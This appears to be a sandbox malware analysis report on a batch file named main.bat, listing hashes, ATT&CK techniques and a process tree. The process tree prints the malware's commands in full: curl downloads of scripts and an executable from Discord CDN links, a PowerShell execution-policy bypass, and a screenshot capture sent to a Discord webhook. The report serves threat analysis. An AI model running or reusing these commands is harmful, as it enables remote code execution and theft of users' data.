53b114f5d1f0fdf4cbd82b185fefa81e38a3d154e173d89eebe4cede5d0b3513

General

Target

main.bat
Size

736B
MD5

e44cd2728da819f44dea01c4bb8708f3
SHA1

6244216fc0905f4c3c16446cf8ff664605e1b769
SHA256

53b114f5d1f0fdf4cbd82b185fefa81e38a3d154e173d89eebe4cede5d0b3513
SHA512

e5a7c2cdb44442b42a9dd1a9adef38e2fc95839585a029d84a7c18abe2e528dec1d19863f5e407b1b757bb449a7875d95acac53edef1e0d6c5f0c1e020675aff

Score

8^/10

execution

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	d.exe

Executes dropped EXE 1 IoCs

pid	Process
376	d.exe

Loads dropped DLL 1 IoCs

pid	Process
376	d.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
33	discord.com
34	discord.com
36	discord.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
852	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
852	powershell.exe
852	powershell.exe
3372	powershell.exe
3372	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
852	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3372	powershell.exe
3372	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 2248	1840	cmd.exe	86
PID 1840 wrote to memory of 2248	1840	cmd.exe	86
PID 1840 wrote to memory of 4676	1840	cmd.exe	90
PID 1840 wrote to memory of 4676	1840	cmd.exe	90
PID 4676 wrote to memory of 464	4676	cmd.exe	92
PID 4676 wrote to memory of 464	4676	cmd.exe	92
PID 4676 wrote to memory of 852	4676	cmd.exe	93
PID 4676 wrote to memory of 852	4676	cmd.exe	93
PID 4676 wrote to memory of 4160	4676	cmd.exe	94
PID 4676 wrote to memory of 4160	4676	cmd.exe	94
PID 4676 wrote to memory of 3352	4676	cmd.exe	96
PID 4676 wrote to memory of 3352	4676	cmd.exe	96
PID 3352 wrote to memory of 3372	3352	cmd.exe	97
PID 3352 wrote to memory of 3372	3352	cmd.exe	97
PID 4676 wrote to memory of 1984	4676	cmd.exe	98
PID 4676 wrote to memory of 1984	4676	cmd.exe	98
PID 3352 wrote to memory of 2324	3352	cmd.exe	99
PID 3352 wrote to memory of 2324	3352	cmd.exe	99
PID 4676 wrote to memory of 376	4676	cmd.exe	100
PID 4676 wrote to memory of 376	4676	cmd.exe	100
PID 4676 wrote to memory of 3420	4676	cmd.exe	101
PID 4676 wrote to memory of 3420	4676	cmd.exe	101
PID 376 wrote to memory of 4892	376	d.exe	104
PID 376 wrote to memory of 4892	376	d.exe	104
PID 4892 wrote to memory of 2260	4892	cmd.exe	105
PID 4892 wrote to memory of 2260	4892	cmd.exe	105

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\system32\curl.exe
  curl -L -o "C:\Users\Admin\AppData\Local\Temp\m.bat" "https://cdn.discordapp.com/attachments/1262342351204913162/1265431030639366375/oiupoiuwqrer.bat?ex=66a17bfc&is=66a02a7c&hm=ec86d43722a8e68e4cdc98bf48f40bc025463cfdbb8224bbb583e00d3a3ca1d9&"
  2⤵
  PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\m.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Windows\system32\curl.exe
    curl -L -o "C:\Users\Admin\AppData\Local\Temp\o.ps1" "https://cdn.discordapp.com/attachments/1248385599917002912/1265360062692458593/o.ps1?ex=66a139e4&is=669fe864&hm=a0496ad869ec5c28a989c2baba1224e0898912817ea1ae2495781d25bf5772f6"
    3⤵
    PID:464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\o.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:852
- - C:\Windows\system32\curl.exe
    curl -L -o "C:\Users\Admin\AppData\Local\Temp\ss.bat" "https://cdn.discordapp.com/attachments/1263583818644848681/1265430150259150848/ss.bat?ex=66a17b2a&is=66a029aa&hm=c29c11e440e1d52fd4f425c1c7b2388521d2a1b7458ecc34797236a2d7499cd9&"
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ss.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('^{PRTSC}'); Start-Sleep -Milliseconds 500; $img = [System.Windows.Forms.Clipboard]::GetImage(); $img.Save('screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);}"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3372
  - - C:\Windows\system32\curl.exe
      curl -H "Content-Type: multipart/form-data" -F "[email protected]" "https://discord.com/api/webhooks/1265425452521099286/COuslAkvTglMUx2Cn_rGRYC7hKZdcuXR0efCHmd8wIjRG-Uisg05aPW3PQRnCEjL_gcK"
      4⤵
      PID:2324
- - C:\Windows\system32\curl.exe
    curl -L -o "C:\Users\Admin\AppData\Local\Temp\d.exe" "https://cdn.discordapp.com/attachments/1262342351204913162/1265055797185089566/main.exe?ex=66a17005&is=66a01e85&hm=b34b6d6c0ff3ed2e93dd6402afc40be313f2d165a0e7dd8ad23bc4b40bebc2e2&"
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Local\Temp\d.exe
    "C:\Users\Admin\AppData\Local\Temp\d.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        5⤵
        
        PID:2260
- - C:\Windows\system32\curl.exe
    curl -H "Content-Type: application/json" -d "{\"content\":\"## `Some one has ran SAS excpect logs to come through`\"}" https://discord.com/api/webhooks/1265425452521099286/COuslAkvTglMUx2Cn_rGRYC7hKZdcuXR0efCHmd8wIjRG-Uisg05aPW3PQRnCEjL_gcK
    3⤵
    PID:3420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arsw1k4q.flk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d.exe

Filesize
37.6MB

MD5
a9e53c8220da34925f781a40a0c0a10d

SHA1
bf467e4ccde1b2649a0a8a44cf5bc231a4df1e25

SHA256
cba969cee2a6b12830ddc5c4dca4bfc04431da08618627f9b6d3fd5eb72e483b

SHA512
f7fafb80c78bde007c185b66112ae40dbe5b1fc29351ed3c5e84c7e7ea30197562e355b4a5c7668168c65acdcc1b847abdaca0026cce6e546ddbae118b7e1553

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.bat

Filesize
1KB

MD5
65f3bf8783e5425df5cbf92c868b01e2

SHA1
c39fca77c2fb75dda27b44fbe930aaa6d2f76106

SHA256
60e7266e9b9989cee0f1481a54a262db14815b329e27b4d73978348f11e15a1d

SHA512
9a1c0d160d2054009a09b65636599f86bf5766e23ab3e93c61b017afa144ae68c43273378ef4170ff2409a46a09b1118e15da71a5c8a63918c3bf92f63f016c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\o.ps1

Filesize
915B

MD5
c2be8f0ae2c786a3634640f6480488f1

SHA1
2d2af95940b3721edfe3f7083181487829c4e03a

SHA256
04ce34d9f2adaa47ae12812b9a5d8f1653e82fad69c1e0ce99332513f028298c

SHA512
35b8e50e1ea699e783e88b57c3c365ed6f015e6679b6d2c4ead700bb4aec8eb9764c9f080074ade834210a83829d1c0e16c682f535d18fe485a0187d4213e58b

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenshot.png

Filesize
461KB

MD5
8ef51f569d5f3c1205d862363d945f10

SHA1
b5168cb24572daf01003a9a9d060814c0dc18ef7

SHA256
42a4137ae57427e479e1908ef0ea12cfcd169831d29cbb1b0c1f919d9570d5c5

SHA512
6782d2350ba91510aeab7453bab1bec71988be5017ea33ac3510165660acee0a92dba064368c8313b57a35a016a9e2f82695b5c8a001d9caec1a8684d2239ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ss.bat

Filesize
702B

MD5
cfb55498c442baa07e7f1b6411a52d69

SHA1
b21795ecf0a60df1c50fd30ca275e731f162d986

SHA256
d0ab98247fd4c1a3037417d840a73a36e294dd939968a9ec1d6176d30008a672

SHA512
c0437c07f39398552607025baf71835dcf4a758a38a3f6d59ae6e60f09a987b5b72f786491de5864bbe12c64951136ed5e147217d96938369bfb7ab8b3b5e061

Download Submit
memory/852-14-0x00007FFDB7B80000-0x00007FFDB8641000-memory.dmp

Filesize
10.8MB

Download
memory/852-19-0x00007FFDB7B80000-0x00007FFDB8641000-memory.dmp

Filesize
10.8MB

Download
memory/852-29-0x000001D6CAD60000-0x000001D6CAD98000-memory.dmp

Filesize
224KB

Download
memory/852-30-0x000001D6CA910000-0x000001D6CA91E000-memory.dmp

Filesize
56KB

Download
memory/852-16-0x00007FFDB7B80000-0x00007FFDB8641000-memory.dmp

Filesize
10.8MB

Download
memory/852-4-0x000001D6C80E0000-0x000001D6C8102000-memory.dmp

Filesize
136KB

Download
memory/852-3-0x00007FFDB7B83000-0x00007FFDB7B85000-memory.dmp

Filesize
8KB

Download
memory/852-110-0x00007FFDB7B83000-0x00007FFDB7B85000-memory.dmp

Filesize
8KB

Download
memory/852-111-0x00007FFDB7B80000-0x00007FFDB8641000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing